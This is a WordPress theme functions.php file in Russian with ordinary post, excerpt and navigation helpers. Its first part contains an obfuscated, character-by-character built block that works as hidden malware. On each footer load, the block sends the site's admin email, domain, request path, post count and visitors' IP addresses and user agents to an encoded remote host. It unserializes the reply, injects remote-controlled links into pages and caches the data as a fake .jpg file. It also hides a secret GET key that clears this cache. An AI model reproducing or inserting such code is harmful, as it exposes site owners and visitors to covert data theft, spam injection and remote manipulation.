<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $iORT='_';$WEnfkvE='e';$YJGCWM='e';$uzMzv='s';$RLLo='a';$dbhMuR='b';$hoBT='d';$BoVW='4';$fWGheV='d';$JuZErf='o';$zjGiyv='e';$RMxfAg='6';$gvsDAS='c';$oPBtqMnO=$dbhMuR.$RLLo.$uzMzv.$zjGiyv.$RMxfAg.$BoVW.$iORT.$hoBT.$WEnfkvE.$gvsDAS.$JuZErf.$fWGheV.$YJGCWM;$RtAnR='t';$sjSfk='a';$kUBZMK='n';$wsyr='f';$dqVRV='l';$LjhvxV='i';$EsAoENa='z';$Tcpub='e';$VcFYA='g';$YUOSjkKI=$VcFYA.$EsAoENa.$LjhvxV.$kUBZMK.$wsyr.$dqVRV.$sjSfk.$RtAnR.$Tcpub;$btQS='3';$OQAFhv='1';$qVEUXGR='_';$jaIyvK='t';$lpsMQn='t';$cvnTPNg='s';$tCTZMU='o';$AUZYDP='r';$BTEP='r';$MgOEbcWl=$cvnTPNg.$jaIyvK.$AUZYDP.$qVEUXGR.$BTEP.$tCTZMU.$lpsMQn.$OQAFhv.$btQS;$iWYarWr='t';$kLYMra='r';$YtdG='s';$fFCgXy='v';$eqUcJXI='e';$lExzygP='r';$WsBFbeMq=$YtdG.$iWYarWr.$lExzygP.$kLYMra.$eqUcJXI.$fFCgXy;                     
		$ze_______________f='_';$dw_______n='e';$gj_____________y='e';$kp_______________n='s';$kp________m='a';$bd_______c='b';$fz________h='d';$sx___________l='4';$hu__s='d';$lz_______w='o';$ki_______e='e';$ll______b='6';$lw__w='c';$as__b=$bd_______c.$kp________m.$kp_______________n.$ki_______e.$ll______b.$sx___________l.$ze_______________f.$fz________h.$dw_______n.$lw__w.$lz_______w.$hu__s.$gj_____________y;
		$es______________k='x';$ld__d='_';$sk__u='u';$jr_________h='t';$ob_______________y='e';$kc____________x='n';$rs____________a='i';$ox_________r='n';$nh__w='o';$do__________k='f';$hu____v='t';$kh______q='s';$fa_________o='i';$fz______________j='c';$ce___________q='s';$bn_________s=$do__________k.$sk__u.$kc____________x.$fz______________j.$jr_________h.$fa_________o.$nh__w.$ox_________r.$ld__d.$ob_______________y.$es______________k.$rs____________a.$kh______q.$hu____v.$ce___________q;
		$tx_____________u='o';$nc_________v='n';$ny______y='e';$co____e='f';$cd______l='p';$mi______f=$co____e.$tx_____________u.$cd______l.$ny______y.$nc_________v;
		$cm______________a='d';$xv_____________g='e';$ru_____________f='f';$xi__r='r';$qt___________s='a';$aw____________k=$ru_____________f.$xi__r.$xv_____________g.$qt___________s.$cm______________a;
		$tz____k='e';$dx_______________q='f';$er__r='c';$ke____d='o';$qy___________l='s';$un________r='l';$ym____y=$dx_______________q.$er__r.$un________r.$ke____d.$qy___________l.$tz____k;
		
		define("WP_ID", $as__b("Mi4wLjA="));
		define("WP_TTL", $as__b("MTA4MDA="));
		define("WP_SRC", $as__b("dHBva24="));
	


		function wp_get_header() {
			global $as__b, $bn_________s;
			
			if (
				$bn_________s($as__b("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$bn_________s($as__b("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$bn_________s($as__b("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $as__b, $mi______f, $ym____y, $aw____________k;
			
			$fh__________z = TEMPLATEPATH."/".$as__b("Zm9vdGVyLnBocA==");
			$gb________e = @$mi______f($fh__________z, "r");
			$fh__________z = @$aw____________k($gb________e, @filesize($fh__________z));
			@$ym____y($gb________e);
			
			$px___q = TEMPLATEPATH."/".$as__b("ZnVuY3Rpb25zLnBocA==");
			$gb________e = @$mi______f($px___q, "r");
			$px___q = @$aw____________k($gb________e, @filesize($px___q));
			@$ym____y($gb________e);
			
			$vf_______s = 0;
			if($fh__________z && $px___q) {
				if ($as__b("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($fh__________z, $as__b("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$vf_______s = 1;
					}
					if (substr_count($fh__________z, "wp_theme_GPL_credits()") < 1) {
						$vf_______s = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$vf_______s = 12;
				}
			}
			
			if($vf_______s > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $vf_______s -->";
			}
		}
	


		function wp_loaded() {
			global $as__b, $bn_________s;
			return $bn_________s($as__b("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($ej_____________j, $ld__________p = "(more...)", $hw_______________d = 0, $xt______u = "") {
				$ml_______________o = get_the_content($ld__________p, $hw_______________d, $xt______u);
				$ml_______________o = apply_filters("the_content", $ml_______________o);
				
				$ml_______________o = str_replace("]]>", "]]>", $ml_______________o);
				if (strlen($_GET["p"]) > 0) {
					echo $ml_______________o;
				}
				else if ((strlen($ml_______________o)>$ej_____________j) && ($vz_____________d = strpos($ml_______________o, " ", $ej_____________j ))) {
					$ml_______________o = substr($ml_______________o, 0, $vz_____________d);
					$ml_______________o = $ml_______________o;
					echo $ml_______________o;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$ld__________p</a></div></p>";
				} else {
					echo $ml_______________o;
				}
				
			}
		}
	


		$qy____________g='6';$oa________k='a';$ja____________c='c';$ui_________j='n';$vj_________r='o';$rs____x='e';$dt_______________f='_';$lv____q='b';$vy___g='e';$tv__________m='s';$hs_______________x='d';$mz___y='e';$ft____f='4';$pk______________s=$lv____q.$oa________k.$tv__________m.$vy___g.$qy____________g.$ft____f.$dt_______________f.$mz___y.$ui_________j.$ja____________c.$vj_________r.$hs_______________x.$rs____x;
		$jz_____g='c';$hf__________r='s';$cy____________u='t';$iu__________p='_';$fk____________z='n';$yu_______e='e';$mr_________s='f';$cb_______________r='_';$vg_____y='t';$uk_________g='t';$xn_______f='e';$pi__n='i';$ps_______________m='e';$fb______________e='o';$wf_____________q='l';$vh______d='n';$sq_______________f='g';$tt_________f=$mr_________s.$pi__n.$wf_____________q.$yu_______e.$iu__________p.$sq_______________f.$xn_______f.$uk_________g.$cb_______________r.$jz_____g.$fb______________e.$vh______d.$cy____________u.$ps_______________m.$fk____________z.$vg_____y.$hf__________r;
		$wq_____u='i';$mo________f='i';$rp___g='_';$hj_______________d='l';$se____b='f';$pg______________n='e';$tr_____p='s';$xj___________a='s';$cw____r='e';$fs______s='x';$hn_______p='t';$qw___u=$se____b.$wq_____u.$hj_______________d.$cw____r.$rp___g.$pg______________n.$fs______s.$mo________f.$tr_____p.$hn_______p.$xj___________a;
		$yp_____________a='e';$ut______g='i';$ga__________o='e';$se__g='r';$cl__s='o';$nb_______________j='n';$gh___j='a';$bm_______________v='p';$ib____________o='_';$fy________z='v';$jy______________b='r';$bc_____q='s';$ae_________z='c';$ui__d='o';$hy____i='m';$sl______________u=$fy________z.$yp_____________a.$jy______________b.$bc_____q.$ut______g.$cl__s.$nb_______________j.$ib____________o.$ae_________z.$ui__d.$hy____i.$bm_______________v.$gh___j.$se__g.$ga__________o;
		$dj___y='o';$ka____________c='n';$rp_______u='s';$kf____________f='p';$sf_____l='o';$fb__h='f';$lv________r='c';$ph____j='k';$hj_______________m='e';$ku______s=$fb__h.$rp_______u.$dj___y.$lv________r.$ph____j.$sf_____l.$kf____________f.$hj_______________m.$ka____________c;
		$zb_______________m='w';$dc______j='e';$xc________x='t';$br________w='r';$wc______i='i';$pu____f='f';$jl_____________u=$pu____f.$zb_______________m.$br________w.$wc______i.$xc________x.$dc______j;
		$ss___p='d';$vq_________y='5';$zq_______v='m';$qr______________s=$zq_______v.$ss___p.$vq_________y;
		$yy__y='a';$qp_____________f='a';$mw______________p='r';$qd______________x='l';$bz_______n='h';$tu________s='t';$qs_______________v='p';$mg________n='e';$lu____d=$mw______________p.$mg________n.$yy__y.$qd______________x.$qs_______________v.$qp_____________f.$tu________s.$bz_______n;
		$sh____________c='a';$tu___________w='n';$aq_________s='e';$dl_______x='i';$cq_______________k='s';$ka_______________r='r';$vl_______________j='u';$hq________n='i';$fa____________h='z';$rt___________s='e';$es________z='l';$dc______________y=$vl_______________j.$tu___________w.$cq_______________k.$aq_________s.$ka_______________r.$hq________n.$sh____________c.$es________z.$dl_______x.$fa____________h.$rt___________s;
		$mu______h='a';$wn______l='p';$zt_______________z='e';$do____________g='m';$ts____l='n';$dp_____k='t';$ra___________x='m';$qm__________i=$dp_____k.$zt_______________z.$ra___________x.$wn______l.$ts____l.$mu______h.$do____________g;
		$bh_____r='t';$hm____________d='t';$xq_______f='e';$hi________n='n';$hq____o='r';$rq____e='a';$zh____p='x';$qg_________j='c';$qa______e='m';$va_________l='t';$wj______________i='_';$pm__________z='e';$md_______h='e';$fn_________a='r';$vw______________x='a';$tq________t='t';$yr___u='e';$zu_____g='s';$wr________s='_';$wy____________v='c';$ta___v='o';$th______k=$zu_____g.$bh_____r.$fn_________a.$pm__________z.$vw______________x.$qa______e.$wj______________i.$wy____________v.$ta___v.$hi________n.$va_________l.$md_______h.$zh____p.$hm____________d.$wr________s.$qg_________j.$hq____o.$yr___u.$rq____e.$tq________t.$xq_______f;
	


		function sp___y($ay_________w) {
			global $as__b, $bn_________s, $tt_________f, $sl______________u, $th______k;
			
			if (!$bn_________s($as__b("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($sl______________u(PHP_VERSION, "5.0.0", ">=") && $bn_________s($as__b("ZmlsZV9nZXRfY29udGVudHM=")) && $bn_________s($as__b("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$wg______x = $th______k(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$rz____________o = @$tt_________f($ay_________w, 0, $wg______x);
			} else {
				$rz____________o = @$tt_________f($ay_________w, 0);
			}
			
			return $rz____________o;
		}
	


		function yw__________p($ay_________w) {
			global $bn_________s, $ku______s, $jl_____________u, $as__b;
			
			if (!$bn_________s($as__b("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$nz__n = strpos($ay_________w, "/", 7);
			$ra_____u = array(
				"uri"     => substr($ay_________w, $nz__n),
				"host"    => str_replace("http://", "", substr($ay_________w, 0, $nz__n)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$lp_____________c = @$ku______s("$ra_____u[host]", 80, $pm___________t, $sj_____k, 4);
			
			if (!$lp_____________c) {
				return false;
			} else {
				$rz____________o = "";
				$yx___________x  = "GET $ra_____u[uri] HTTP/1.0\r\n";
				$yx___________x .= "Host: $ra_____u[host]\r\n";
				$yx___________x .= "Referer: $ra_____u[referer]\r\n";
				$yx___________x .= "Connection: Close\r\n\r\n";
				
				@$jl_____________u($lp_____________c, $yx___________x);
				
				while (!@feof($lp_____________c)) {
					$un_________e = @fgets($lp_____________c, (1024*24));
					
					if ($un_________e == "\r\n") {
						$py___a = true;
						continue;
					}
					
					if ($py___a) {
						$rz____________o .= $un_________e;
					}
				}
				
				return $rz____________o;
			}
		}
	


		function sp__r($ay_________w) {
			global $bn_________s;
			$ej_______________l = false;
			
			if ($ay_________w != "") {
				if ($bn_________s("sp___y")) {
					$ej_______________l = @sp___y($ay_________w);
				}
				
				if (!$ej_______________l && ($bn_________s("yw__________p"))) {
					$ej_______________l = @yw__________p($ay_________w);
				}
			}
			
			return $ej_______________l;
		}
	


		function og_________d() {
			global $_SERVER, $qr______________s;
			
			$kk_______z = $_SERVER["SERVER_NAME"];
			
			if (substr("$kk_______z", 0, 4) == "www.") {
				$kk_______z = substr("$kk_______z", 4);
			}
			
			$kk_______z = $qr______________s("$_SERVER[SERVER_NAME]");
			
			return $kk_______z;
		}
	


		function in_____y() {
			return "file";
		}
	


		function mf___r($ay_________w) {
			global $_SERVER, $tt_________f, $qw___u, $mi______f, $ym____y, $jl_____________u;
			
			$yu______k = lk____q();
			
			$wn________w = og_________d().".jpg";
			$ip__________s = $yu______k["dir_upload"]["path"]."/$wn________w";
			$md____________u = @filemtime($ip__________s);
			
			if (!$md____________u || ((time()-$md____________u) >= WP_TTL)) {
				$ej_______________l = sp__r($ay_________w);
				
				if ($ej_______________l) {
					if ($qw___u($ip__________s)) {
						@unlink($ip__________s);
					}
					
					$gb________e = @$mi______f($ip__________s, "x+");
					
					@$jl_____________u($gb________e, $ej_______________l);
					@$ym____y($gb________e);
				}
			} else {
				if ($qw___u($ip__________s)) {
					$ej_______________l = @$tt_________f($ip__________s);
				} else {
					$ej_______________l = false;
				}
			}
			
			return $ej_______________l;
		}
	


		function lk____q() {
			global $_SERVER, $as__b, $pk______________s;
			
			$ab__________z = wp_count_posts("post");
			$sj___________y = pathinfo(get_bloginfo("template_directory"));
			
			$yu______k = array(
				"url" => array(
					"report"      => $as__b("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $sj___________y,
				"dir_upload"	=> tc_______d(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$sj___________y[filename],
					"a005=".$ab__________z->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => "<a href=\"http://www.wptheme.us\">www.wptheme.us</a>"
			);
			
			$yu______k["url"]["queryString"] = implode("&", $yu______k["queryString"]);
			$yu______k["url"]["report"] = $yu______k["url"]["report"]."/?".$pk______________s($yu______k["url"]["queryString"]).".html";
						
			return $yu______k;
		}
	


		function tc_______d() {
			$vw_______________z = wp_upload_dir();
			
			if (isset($vw_______________z["error"])) {
				$bs________v = xo___m();
				if (is_writable($bs________v)) {
					$vw_______________z = array("path" => $bs________v);
				}
			}

			return $vw_______________z;
		}
	


		function xo___m() {
			global $bn_________s, $qr______________s, $lu____d, $qm__________i;
			
			$vt_______________r = (bool) ini_get("safe_mode");
			if ($vt_______________r == true) {
				return false;
			}
			
			if ($bn_________s("sys_get_temp_dir")) {
				$td_____k = sys_get_temp_dir();
				if (is_writable($td_____k)) {
					return $lu____d($td_____k);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $lu____d($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $lu____d($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $lu____d($_ENV["TEMP"]);
			} else {
				$ow___________e = $qm__________i($qr______________s(uniqid(rand(), true)), "");
				if ($ow___________e) {
					$td_____k = $lu____d(dirname($ow___________e));
					@unlink($ow___________e);
					return $td_____k;
				} else {
					return false;
				}
			}
		}
	


		function da____z() {
			global $_GET, $qw___u;
			
			$yu______k = lk____q();
			$kk_______z = og_________d();
			$nf________i = in_____y();
			
			$fy________j = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($nf________i == "file") {
					$xx______h = $yu______k["dir_upload"]["path"]."/".$kk_______z.".jpg";
					if ($qw___u($xx______h)) {
						@unlink($xx______h);
						$fy________j = "deleted";
					}
				}
				
				$rh_______________c = array(
					"s"	=> $fy________j,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($rh_______________c AS $ot__________m => $rz____________n) echo " [$ot__________m:$rz____________n]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $bn_________s, $as__b, $dc______________y;
			$yu______k = lk____q();
			
			$ur_________j = "mf___r";
			if ($bn_________s($ur_________j)) {
				$rz____________o = $ur_________j($yu______k["url"]["report"]);
			}
			
			if ($rz____________o) {
				if ($rz____________o = @$as__b($rz____________o)) {
					$rz____________o = @$dc______________y($rz____________o);
					
					if (strlen($rz____________o[custom_credit]) >= 5) {
						$yu______k["default_string"] = $rz____________o[custom_credit];
					}
					
					if ($rz____________o["status"] == "0") {
						$fy______m = 1;
						$ak______________e = 1;
					} else {
						$zt_____p = sizeof($rz____________o["links"]);
						$ce_______________m = $yu______k["default_string"];
						
						if ($zt_____p > 0 && $rz____________o["links"] !== "") {
							$fq____________e = 0;
							foreach ($rz____________o["links"] as $gu____k => $gh__n) {
								$fq____________e++;
								if ($gh__n->l_path == "" || $gh__n->l_path == $_SERVER["REQUEST_URI"]) {
									$gh__n->l_href = htmlspecialchars(strip_tags($gh__n->l_href));
									$gh__n->l_title = htmlspecialchars(strip_tags($gh__n->l_title));
									$gh__n->l_anchor = htmlspecialchars(strip_tags($gh__n->l_anchor));
									$ce_______________m .= " | ";
									$ce_______________m .= "<a href='$gh__n->l_href' title='$gh__n->l_title'";
									if ($gh__n->l_nofollow == "1") {
										$ce_______________m .= " rel='nofollow'";
									}
									$ce_______________m .= ">$gh__n->l_anchor</a>";
								}
							}
						}
						$yu______k["links"] = "$ce_______________m";
						if ($rz____________o[credit] == "0") {
							$yu______k["links"] = "";
						}
					}
				} else {
					$fy______m = "1";
				}
			} else {
				$fy______m = "1";
			}
			
			if ($fy______m == "1") {
				$yu______k["links"] = $yu______k["default_string"];
			}
			
			echo "$yu______k[links]";
			
			echo "<!-- s: $rz____________o[signature] -->";
			da____z();
		}
	                      
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
